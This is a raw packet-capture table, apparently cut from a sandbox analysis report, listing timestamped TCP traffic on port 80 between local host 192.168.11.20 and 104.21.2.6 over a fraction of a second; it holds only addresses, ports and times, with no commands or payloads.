                                                                    Nov 28, 2022 16:37:04.306231976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306243896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306253910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306266069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306277990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306375980 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.306405067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306418896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306431055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306442976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306453943 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306466103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306476116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306488037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306513071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306525946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306539059 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.306539059 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.306545973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306559086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306571960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306598902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306651115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306663990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306675911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306688070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306699991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306703091 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.306756020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306768894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306781054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306793928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306807041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306828022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306896925 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.307024002 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.307024002 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.323779106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.345273972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345357895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345387936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345412016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345439911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345463991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345487118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345510960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345539093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345596075 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.345596075 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.345628023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345799923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.345799923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.345855951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345870972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345884085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345906973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345928907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345936060 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.345963955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345983028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.345995903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346008062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346019983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346031904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346044064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346055984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346067905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346081018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346092939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346103907 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346103907 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346112967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346124887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346137047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346148968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346162081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346183062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346204042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346225977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346241951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346254110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346266985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346275091 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346290112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346302986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346317053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346329927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346343040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346357107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346369982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346383095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346395969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346410036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346422911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346436977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346441984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346455097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346468925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346482038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346493006 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346507072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346524954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346539021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346558094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346579075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346601963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346625090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346641064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346653938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346662045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346662998 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346676111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346688986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346703053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346735001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346749067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346761942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346776009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346788883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346801996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346816063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346828938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346842051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346856117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346868992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346877098 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.346893072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346910954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346925020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.346935987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347034931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347047091 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347047091 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347110987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347134113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347145081 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347156048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347170115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347182989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347197056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347209930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347223997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347237110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347249985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347264051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347276926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347290993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347304106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347315073 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347323895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347337961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347352028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347364902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347378969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347392082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347405910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347419977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347433090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347445965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347465992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347469091 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347469091 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347486973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347636938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347640991 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347671032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347692966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347714901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347733021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347744942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347757101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347769976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347781897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347794056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347809076 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347817898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347839117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347862959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347886086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347908020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347930908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.347980022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.347980022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348016024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348040104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348066092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348073006 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348103046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348124981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348148108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348170042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348192930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348215103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348242998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348247051 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348277092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348305941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348337889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348357916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348381042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348404884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348408937 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348408937 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348408937 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348445892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348469973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348495007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348516941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348541975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348562002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348577023 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348598003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348619938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348642111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348664045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348676920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348690033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348701954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348714113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348726034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348737955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348746061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348746061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348746061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348762989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348774910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348788023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348799944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348815918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348836899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348859072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348877907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348891020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348903894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348913908 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.348922014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348934889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348948002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348959923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348972082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348984003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.348995924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349013090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349034071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349056959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349076986 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349076986 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349090099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349102974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349114895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349127054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349138975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349150896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349163055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349174976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349186897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349206924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349229097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349246025 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349258900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349275112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349287987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349292040 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349307060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349320889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349334002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349348068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349361897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349375010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349387884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349401951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349415064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349428892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349451065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349469900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349484921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349600077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349613905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349627018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349633932 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349633932 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349651098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349664927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349678040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349690914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349704981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349719048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349739075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349757910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349776983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349798918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349803925 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349824905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349838972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349852085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349865913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349879026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349893093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349905968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349919081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349939108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349953890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349967957 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.349972010 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.349987030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.350001097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.350013971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.350145102 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.350145102 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.350337029 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.350591898 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.358541965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358679056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358694077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358710051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358728886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358741045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358756065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358768940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358781099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358793020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358805895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358819008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358830929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358843088 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358855963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358867884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358880997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358892918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358906031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.358921051 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.358921051 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.359086990 CET4983080192.168.11.20104.21.2.6
